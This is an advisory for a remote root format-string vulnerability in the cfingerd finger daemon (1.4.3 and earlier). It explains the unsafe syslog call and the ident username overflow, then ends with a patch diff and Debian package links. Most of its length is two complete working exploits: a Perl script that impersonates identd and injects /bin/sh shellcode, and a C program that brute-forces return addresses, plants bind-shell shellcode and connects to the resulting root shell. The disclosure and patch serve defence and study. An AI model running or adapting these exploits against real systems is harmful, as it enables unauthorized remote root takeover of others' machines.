COMMAND
cfingerd
SYSTEMS AFFECTED
cfingerd <=1.4.3
PROBLEM
Megyer Laszlo found following. There is a critical bug in cfingerd
daemon <= 1.4.3, (a classic format bug) that makes possible
to acquire full control over the remote machine if it runs the
cfingerd program, the configurable and secure finger daemon. In 3
words: REMOTE ROOT VULNERABILITY.
The bug occurs in main.c, line 245, 258 and 268:
syslog(LOG_NOTICE, (char *) syslog_str);
We can control the syslog_str with our ident user, that goes
directly to the secont parameter of syslog(). Using %n and some
tricks, we can overwrite anything in the daemon's memory,
including the saved eip register.
The more or less proper usage of syslog this time is here:
syslog(LOG_NOTICE, "%s", (char *) syslog_str);
There are many papers about format bugs, so we don't write
detailed infos about it.
Exploiting it is a bit tricky because we use another bug in the
code. The ident reply is something like this:
3478, 79 : UNIX : USERID : username
If the username is more than 64 bytes, cfingerd logs some strange
string:
[64b username]3478, 79 : UNIX : USERID : [64b username][rest of the username]
The following code is responsible of this strange behaviour:
for (xp=uname; *cp != '\0' &&
*cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
*(xp++) = *cp;
You can see that no space is left for the string terminating '\0'
character, so the next local variable which is the line that was
read from identd will also be returned as the end of the username.
Example, the fake identd sends:
[120 B's] : : :[64 A's]
the username that is returned by get_rfc1413_data() will be:
[64 A's][120 B's] : : :...
Then an snprintf cuts the string that will go to syslog() allowing
only 200 bytes to pass. If the username is one byte, we will have
183 bytes we can control there. ("a fingered from username@host")
where host doesn't have place, so it won't get into syslog().
(another sechole).
Now we have a method to send 183 bytes to syslog(). We have to
find out some basic variables to be able to exploit this, which
we can bruteforce easily one-by-one (details in "fingex" exploit).
#!/usr/bin/perl
# Cfingerd exploit to the recent syslog format bug.
# Discovered and written by Lez <abullah@freemail.hu> in 2001.
# you have to use it as root to bind port 113.
# tested on Debian 2.1, 2.2
use IO::Socket;
#use strict;
my $network_timeout=5;
my $sleep_between_fingers=2; # should be enough
my $debug_sleep=0;
my $fingerport=79;
my $target=$ARGV[0];
my $debug=1;
my $test_vulnerability=1;
# Debian 2.2, cfingerd 1.4.1-1
#my $control=33; # if don't set it, exploit will find.
#my $align=0; # the same
#$retaddr=0xbffffab0;
# my $retaddr=0xbffff880; # the same
#$retaddr=0xbffff840;
my $retvalue=0xbffff980; # If it finds everything correctly, and says Shell lunched, but
# you can't find your uid 0, decrease $retvalue by 30.
my $bytes_written=32;
#$control=17;
#$align=0;
#$retaddr=0xbffffb80; #(or 0xbffffb68 0xbffff9d0 0xbffff9cc 0xbffff9c8)
#$retvalue=0xbffffc20;
#$bytes_written=32;
# GOOD:
my $startsig11=0xbffffbfc;
my $endsig11= 0xbffff000;
my $controlstart=45;
my $controlend=1;
my $fclient;
my $shellcode ="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80".
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b".
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd".
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#59 bytes
if (!$target) {print "Usage: $0 target\n";exit}
# Starting fake identd
my $identd = IO::Socket::INET->new(
Listen => 5,
LocalPort => 113,
Proto => 'tcp',
Reuse => 3) or die "Cannot listen to port 113: $!\n";
if ($test_vulnerability) {&testvuln}
if (!$control) { &get_control_and_align }
else {print "Alignment: $align\nControl: $control\n" }
if (!$retaddr) {
&find_and_exploit_sigsegv_values
}
else {
printf "Using provided RET address: 0x%x\n",$retaddr;
&exploit ($retaddr, $retvalue);
}
exit;
sub sendthisone { #sends a string to cfingerd, and returns 1 if the remote machine got SIGSEGV or SIGILL.
# a bit tricky
my $text_to_send=$_[0];
$text_to_send =~ s/^\ /\ \ /;
my ($last_119, $gotback);
$fclient = IO::Socket::INET->new("$target:$fingerport") or die "Cannot connect to $target: $!\n";
print $fclient "e\n"; # e is the username we query.
my $ident_client = $identd-> accept;
my $tmp=<$ident_client>;
my $first_64= substr($text_to_send, 0, 64);
if (length($text_to_send) > 64) {
$last_119= substr($text_to_send,64);
}
sleep $debug_sleep;
print $ident_client "$last_119: : :$first_64\n"; # we use an other bug
# in rfc query function
# to send longer lines.
close $ident_client;
eval {
local $SIG{ALRM} = sub { die "alarm\n"};
alarm ($network_timeout);
$gotback= <$fclient>;
alarm 0;
};
if ($@) {
die unless $@ eq "alarm\n";
&shell;
}
if ($gotback =~ /SIGSEGV/i) {
if ($debug == 2) {print "Sending $first_64$last_119: SIGSEGV\n";}
elsif ($debug == 1) {system ("echo -n \"*\"");}
sleep ($sleep_between_fingers);
return 1;
} elsif ($gotback =~ /SIGILL/i) {
if ($debug == 2) {print "Sending $first_64$last_119: SIGILL\n";}
elsif ($debug == 1) {system ("echo -n +");}
print "Got signal \"Illegal instruction\".\nThe ret address is not correct\n";
sleep ($sleep_between_fingers);
return 1;
} else {
if ($debug == 2) {print "Sending $first_64$last_119\n";}
elsif ($debug == 1) {system ("echo -n .");}
sleep ($sleep_between_fingers);
return 0;
}
}
sub get_control_and_align {
for ($control=$controlstart; $control >= $controlend; $control--) {
for ($align=3; $align>=0; $align--) {
my $s1= "A"x$align . "\x79\xff\xff\xbe" . "%" . $control . "\$n";
my $s2= "A"x$align . "\x79\xff\xff\xbf" . "%" . $control . "\$n";
if (sendthisone($s1) > sendthisone ($s2)) {
print "\nControl: $control\nAlign: $align\n";
return;
}
}
}
die "Could not find control and alignment values\n";
}
sub find_and_exploit_sigsegv_values {
my ($sendbuf, @back, $addy, $retaddr, $save);
print "Searching for eip addresses...\n";
for ($addy=$startsig11; $addy >= $endsig11; $addy -=4) {
$sendbuf = "a"x$align . pack "cccc",$addy,$addy>>8,$addy>>16,$addy>>24;
$sendbuf .= "%" . $control . "\$n";
if ($addy%0x100) {
if (sendthisone($sendbuf)) {
&exploit ($addy, $retvalue); # I'm so lazy
&exploit ($addy, $retvalue-60);
&exploit ($addy, $retvalue+60);
&exploit ($addy, $retvalue-120);
&exploit ($addy, $retvalue+120);
&exploit ($addy, $retvalue-180);
&exploit ($addy, $retvalue+180);
&exploit ($addy, $retvalue-240);
&exploit ($addy, $retvalue+240);
&exploit ($addy, $retvalue-300);
&exploit ($addy, $retvalue+300);
&exploit ($addy, $retvalue-360);
&exploit ($addy, $retvalue+360);
&exploit ($addy, $retvalue-420);
&exploit ($addy, $retvalue+420);
}
}
}
}
sub exploit {
my $addy=$_[0];
my $value=$_[1];
my $sendbuf;
printf "\nExploiting 0x%x, ret:0x%x.\n",$addy,$value;
$sendbuf = "Z"x$align;
$sendbuf .= &add_four_addresses($addy);
$sendbuf .= &add_format_strings($value);
$sendbuf .= "\x90"x (182-length($sendbuf)-length($shellcode));
$sendbuf .= $shellcode;
&sendthisone ($sendbuf);
}
sub add_four_addresses {
my $addy=$_[0];
my ($back, $i);
for ($i=0; $i<=3; $i++) {
$back .= pack "cccc",
($addy+$i),
($addy+$i)>>8,
($addy+$i)>>16,
($addy+$i)>>24;
}
return $back;
}
sub add_format_strings {
my ($back, $i, @a, $xvalue, $nvalue, $back);
my $ret=$_[0];
$a[0]=$ret%0x100-$bytes_written;
for ($i=1; $i<=3; $i++) {
$a[$i]= ($ret >> (8*$i) )%0x100 - ($ret >> (8*($i-1)) )%0x100;
}
for ($i=0; $i<=3; $i++) {
$xvalue= &positive($a[$i]);
$nvalue= $control+$i;
if ($xvalue <=8) {
$back .= "A"x$xvalue . "%".$nvalue."\$n";
} else {
$back .= "%0".$xvalue."x" . "%".$nvalue."\$n";
}
}
return $back;
}
sub positive {
my $number=$_[0];
while ($number < 0) {
$number += 0x100;
}
return $number;
}
sub shell {
my ($cucc, $msg);
print "Shell launched\n";
print $fclient "id\n";
print &my_line(1);
while (1) {
$cucc=<STDIN>;
print $fclient $cucc;
while ($msg=&my_line(1)) {
print $msg;
}
}
}
sub my_line {
my $msg;
eval {
local $SIG{ALRM} = sub { die "\n"};
alarm ($_[0]);
if ($msg=<$fclient>) {
alarm (0);
return $msg;
}
};
}
sub testvuln {
if ($debug) {print "Testing if fingerd is vulnerable... "}
if (&sendthisone ("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n")) {
print "Yes.\n";
return;
} else {
print "No.\n";
exit;
}
}
Following is another exploit for it.
/* remote exploit for linux/x86 - cfingerd <= 1.4.3
* coded by venomous of rdC - 16/apr/01
*
* Its just a common formatstring bug using syslog() incorrectly.
* We need to bind as identd, so disable your identd in case you are
* using it.
*
* BONUS: eip address is bruteforced, so relax and wait =)
*
* NOTE: for sure where we control the format string will change from
* platform to platform.
* And for sure, the shellcode address will change so maybe you
* want to bruteforce this too. (-1500 to +1500 should be fine i guess)
*
* REMEMBER: this code is for educational propourses only, do not use
* it on machines without authorization.
*
* INFO: cfingerd isnt a package of slackware 7.0
* cfingerd 1.4.1 is a package of debian 2.2
*
* Greets: ka0z, bruj0, dn0, superluck, fugitivo(!)
* #flatline, #rdC
*
* Credits: To Lez, who found this bug.
*
* http://www.rdcrew.com.ar - Argentinian Security Group.
* venomous@rdcrew.com.ar
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define ROOTSHELLPORT 36864
void chld_timeo();
void chld_timeoo();
int sserver;
int cserver;
int phase=0;
int mmm=0;
unsigned long glob;
//unsigned long startaddr = 0xbffffdfc;
unsigned long startaddr = 0xbffffb34;
unsigned long stopaddr = 0xbffff000;
char pbuf[1024];
char testcode[]=
"\xeb\x0b\x2e\x72\x64\x43\x2e\x72\x6f\x63\x6b\x73\x2e\xeb\xfe";
char linuxcode[]=
/* Lamagra bind shellcode modified by me, making it smaller =) - 124b */
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
struct os
{
int id;
char *os;
char *shellcode;
int fsc;
unsigned long shaddr;
int offset;
};
struct os types[]=
{
{0, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as root", linuxcode, 22, 0xbffffbc4, 30},
{1, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as nobody", linuxcode, 22, 0xbffffbc4, 30},
{2, "debian 2.2 - default cfingerd 1.4.1 running from inetd as root", linuxcode, 33, 0xbffffb48, 0},
{3, "debian 2.2 - default cfingerd 1.4.1 running from inetd as nobody", linuxcode, 33, 0xbffffb48, 0},
{4, NULL, 0, 0xdeadbeef, 0}
};
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct sockaddr_in ssin;
int fd;
int x;
int xx=0;
int sts=0;
int pete;
int a,b,c=22,d=0; /* c is used in case you want to seek the fsc on */
int guide=1; /* your system, starting from 22, change it if you */
int sel=0; /* want. */
int bleh=0; /* */
int off=0;
int arx=0;
int niu=0;
int ye=0;
char buf[1024];
char tex[512];
if (argc < 4)
{
printf("cfingerd <= 1.4.3 remote exploit coded by venomous of rdC\n\n");
printf("Usage: %s <platform> <host> <offset>\n",argv[0]);
printf("where <platform> is:\n");
for (x=0 ; types[x].os != NULL ; x++)
printf("%d for %s\n", types[x].id, types[x].os);
printf("\nhttp://www.rdcrew.com.ar\n\n");
exit(1);
}
for (x=0 ; types[x].os != NULL ; x++)
{
if (types[x].id == atoi(argv[1]) )
{
xx++;
sel = types[x].id;
}
}
if (!xx)
{
printf("Unknown platform: %s\n",argv[1]);
exit(1);
}
off = atoi(argv[3]);
printf("Selected platform: %s (%d)\n",types[sel].os,sel);
bzero(&sin,sizeof(sin));
// fake identd
sin.sin_family = AF_INET;
sin.sin_port = htons(113);
sin.sin_addr.s_addr = htonl(INADDR_ANY);
if ( (fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if ( (x = bind(fd,(struct sockaddr *)&sin, sizeof(sin)) < 0))
{
perror("bind");
exit(1);
}
if ( (xx = listen(fd, 5)) < 0)
{
perror("listen");
exit(1);
}
printf("fake identd bound successfuly\n\n");
printf("pre-phase info: If you need to use the offset you can use safely steps of 120\n\n");
printf("phase 0: finding eip... \n");
while (guide)
{
//maybe you need it..
// if (!d)
// {
preparebuf(sel, off, ye);
fconnect(argv[2], ye, 79);
// }
pete = sizeof(ssin);
if ( (sserver = accept(fd, (struct sockaddr *)&ssin, &pete)) < 0)
{
perror("accept");
exit(1);
}
bzero(buf,sizeof(buf));
read(sserver,buf,sizeof(buf));
//horrendus debug! :)
#ifdef DEBUG
printf("\nread(): %s\n",buf);
#endif
sscanf(buf,"%d,%d",&a,&b);
bzero(buf,sizeof(buf));
bzero(tex,sizeof(tex));
memset(tex,'\x90',119);
bleh=strlen(pbuf);
niu = 0;
while (1)
{
if(strlen(pbuf) < 65)
{
if (phase==0)
pbuf[bleh] = '\x90';
else
pbuf[bleh] = types[sel].shellcode[niu];
bleh++;
if (phase==1)
niu++;
}
else
break;
}
arx = niu;
if(!phase)
for(bleh=0 ; bleh < strlen(testcode) ; bleh++)
tex[119 - strlen(testcode) + bleh] = testcode[bleh];
else
{
if ((119 - (strlen(types[sel].shellcode) - arx)) < 0)
{
printf("shellcode too long, exiting\n");
exit(0);
}
for ( bleh=0 ; bleh < ( (strlen(types[sel].shellcode)) - arx) ; bleh++)
tex[119 - (strlen(types[sel].shellcode)) - arx + bleh] = types[sel].shellcode[bleh+arx];
}
snprintf(buf,sizeof(buf),"%s : : : %s", tex, pbuf);
/* usefull for find the fsc on your system.
//snprintf(buf,sizeof(buf),"%d , %d : UNIX : 1 : AAAA%%%d$p:fsc:%d\n",a,b,c,c);
// read about 'd' below
if (d==2) { c++; d=0; }
*/
write(sserver,buf,sizeof(buf));
//the same..
#ifdef DEBUG
printf("sent: %s\n--------------------\n",buf);
#endif
close(sserver);
sleep(2);
//same..
// if(d)
wait(&sts);
// d++;
/* if something like tcplogd is running there will be 3 connections
* to identd, so in that case, d==3
*/
//if(d==2)
// d=0;
if ((WEXITSTATUS(sts)) == 1) // eip/shellcode address ok (at phase 0)
{
phase=1; ye=1; sts=0;
printf("\nphase 1: calculating address of the first chacarcter in our buffer... wait\n");
}
if ((WEXITSTATUS(sts)) == 2) // shellcode executed (at phase 1)
{
printf("\nphase 2 connecting to rootshell... ");
fflush(stdout);
close(fd); //identd fake server
fconnect(argv[2], 2, ROOTSHELLPORT);
printf("\n\nThanks for using rdC products!\n\n");
exit(0);
}
}
}
int fconnect(char *hname, int what, int port)
{
struct hostent *host;
struct sockaddr_in d;
int r;
char hname2[128];
char response[1024];
d.sin_family = AF_INET;
d.sin_port = htons(port);
bzero(hname2,sizeof(hname2));
strncpy(hname2,hname,sizeof(hname2));
host = gethostbyname(hname2);
if (!host)
{
printf("cannot resolve\n");
exit(0);
}
bcopy(host->h_addr, (struct in_addr *)&d.sin_addr, host->h_length);
cserver = socket(AF_INET, SOCK_STREAM, 0);
// you can add a timeout here, but supossly you know if the server
// is up/not firewalled, because you are using it against an authorized
// machine and not in a script/not authorized machine, right?
if (connect(cserver, (struct sockaddr *)&d, sizeof(struct sockaddr)) < 0)
{
perror("connect");
exit(1);
}
if (what==2)
{
printf("connected!\n");
fflush(stdout);
rootsox(cserver);
close(cserver);
return;
}
write(cserver,"a\n",strlen("a\n"));
if ((fork()) == 0)
{
printf("Waiting response...");
for(r=0 ; r < 19 ; r++)
printf("\b");
fflush(stdout);
bzero(response,sizeof(response));
if (what==0)
signal(SIGALRM, chld_timeo);
else
signal(SIGALRM, chld_timeoo);
alarm(30);
read(cserver,response,sizeof(response));
if (strstr(response,"SIGILL"))
{
printf("Illegal Instruction\r");
fflush(stdout);
close(cserver);
exit(0);
}
if (strstr(response,"SIGSEGV"))
{
printf("Segmentation Fault.\r");
fflush(stdout);
close(cserver);
exit(0);
}
//you might add strings here..
if (strstr(response,"Sorry, that user doesn't exist") || strstr(response,"Debian GNU/Linux"))
{
printf("server not crashed.\r");
fflush(stdout);
close(cserver);
exit(0);
}
}
//close(cserver);
}
/* <huh> */
void chld_timeo()
{
alarm(0);
signal(SIGALRM, SIG_DFL);
printf("EIP FOUND! - SHELLCODE ADDR OK!\n");
fflush(stdout);
close(cserver);
exit(1);
}
void chld_timeoo()
{
alarm(0);
signal(SIGALRM, SIG_DFL);
printf("shellcode executed!\n");
fflush(stdout);
close(cserver);
exit(2);
}
/* </huh> */
int rootsox(int sox)
{
fd_set rset;
int n;
char buffer[4096];
/* we kill the cfingerd in eternal loop and we run other nice commands ;)
*/
char *command="/bin/killall -9 cfingerd ; /bin/uname -a ; /usr/bin/id\n";
send(sox, command, strlen(command), 0);
for (;;) {
FD_ZERO (&rset);
FD_SET (sox, &rset);
FD_SET (STDIN_FILENO, &rset);
n = select(sox + 1, &rset, NULL, NULL, NULL);
if(n <= 0)
return (-1);
if(FD_ISSET (sox, &rset)) {
n = recv (sox, buffer, sizeof (buffer), 0);
if (n <= 0)
break;
write (STDOUT_FILENO, buffer, n);
}
if(FD_ISSET (STDIN_FILENO, &rset)) {
n = read (STDIN_FILENO, buffer, sizeof (buffer));
if (n <= 0)
break;
send(sox, buffer, n, 0);
}
}
return 0;
}
//heavly modified formatstring engine from rdC-LPRng.c exploit - 12/00
preparebuf(int sel, int off, int what)
{
unsigned long addr;
unsigned long a, b, c, d;
int pas1,pas2,pas3,pas4;
int i;
char temp[512];
char buf[512];
char atemp[128];
char bufx[512];
startaddr = startaddr - 0x4;
addr = startaddr;
bzero(temp,sizeof(temp));
bzero(buf,sizeof(buf));
bzero(bufx,sizeof(bufx));
bzero(atemp,sizeof(atemp));
if (addr == stopaddr)
{
printf("\nreached stopaddr, change shellcode address/fsc\n");
exit(1);
}
if(what)
{
off-=mmm;
mmm++;
}
if (mmm == 185)
{
printf("?!.. we cant find the first character of our shellcode!#@\n");
exit(0);
}
snprintf(temp,sizeof(temp),"%p",types[sel].shaddr+types[sel].offset+off);
sscanf(temp,"0x%2x%2x%2x%2x",&a,&b,&c,&d);
pas1 = d - (16 * 2);
pas1 = cn(pas1);
pas2 = c - d;
pas2 = cn(pas2);
pas3 = b - c;
pas3 = cn(pas3);
pas4 = a - b;
pas4 = cn(pas4);
if(what)
addr = glob;
else
glob = addr;
printf("eip: %p - shellcode addr: %p - ",addr,types[sel].shaddr+types[sel].offset+off);
fflush(stdout);
for (i=0 ; i < 4 ; i++)
{
snprintf(atemp,sizeof(atemp),"%s",&addr);
strncat(buf, atemp, 4);
addr++;
}
snprintf(bufx,sizeof(bufx),"%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",pas1,(types[sel].fsc),pas2,(types[sel].fsc)+1,pas3,(types[sel].fsc)+2,pas4,types[sel].fsc+3);
strcat(buf,bufx);
bzero(pbuf,sizeof(pbuf));
strncpy(pbuf,buf,sizeof(pbuf));
}
cn(unsigned long addr)
{
char he[128];
snprintf(he,sizeof(he),"%d",addr);
if (atoi(he) < 8)
addr = addr + 256;
return addr;
}
SOLUTION
The attached patch will fix the four bugs: 3 syslog() bugs and
the bug that allows anybody to send long usernames to syslog() so
the hostname wouldn't get there. To make a bugfixed source tree
save the diff as cfingerd-1.4.3.diff and do:
wget
http://www.infodrom.ffis.de/projects/cfingerd/download/cfingerd-1.4.3.tar.gz
tar xfz cfingerd-1.4.3.tar.gz
cat cfingerd-1.4.3.diff | patch -p0
and the source tree is free of this bug.
--- cfingerd-1.4.3/src/main.c.orig Fri Aug 6 23:33:38 1999
+++ cfingerd-1.4.3/src/main.c Wed Apr 11 18:55:43 2001
@@ -242,7 +242,7 @@
if (!emulated) {
snprintf(syslog_str, sizeof(syslog_str), "%s fingered (internal) from %s", username,
ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_internal(username);
@@ -255,7 +255,7 @@
snprintf(syslog_str, sizeof(syslog_str), "%s fingered from %s",
prog_config.p_strings[D_ROOT_FINGER], ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_standard(username);
@@ -265,7 +265,7 @@
snprintf(syslog_str, sizeof(syslog_str), "%s %s from %s", username,
prog_config.p_strings[D_FAKE_USER], ident_user);
- syslog(LOG_NOTICE, (char *) syslog_str);
+ syslog(LOG_NOTICE, "%s", (char *) syslog_str);
}
handle_fakeuser(username);
--- cfingerd-1.4.3/src/rfc1413.c.orig Sun Aug 29 14:14:25 1999
+++ cfingerd-1.4.3/src/rfc1413.c Wed Apr 11 18:53:45 2001
@@ -98,7 +98,7 @@
if (*(++cp) == ' ') cp++;
memset(uname, 0, sizeof(uname));
- for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&strlen(uname)<sizeof(uname); cp++)
+ for (xp=uname; *cp != '\0' && *cp!='\r'&&*cp!='\n'&&(strlen(uname)+1)<sizeof(uname); cp++)
*(xp++) = *cp;
if (!strlen(uname)) {
For Debian Linux:
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1-1.1.dsc
http://security.debian.org/dists/stable/updates/main/source/cfingerd_1.4.1.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/cfingerd_1.4.1-1.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/cfingerd_1.4.1-1.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/cfingerd_1.4.1-1.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/cfingerd_1.4.1-1.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/cfingerd_1.4.1-1.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/cfingerd_1.4.1-1.1_sparc.deb
For Progeny Linux:
http://archive.progeny.com/progeny/updates/newton/cfingerd_1.4.1-1.1_i386.deb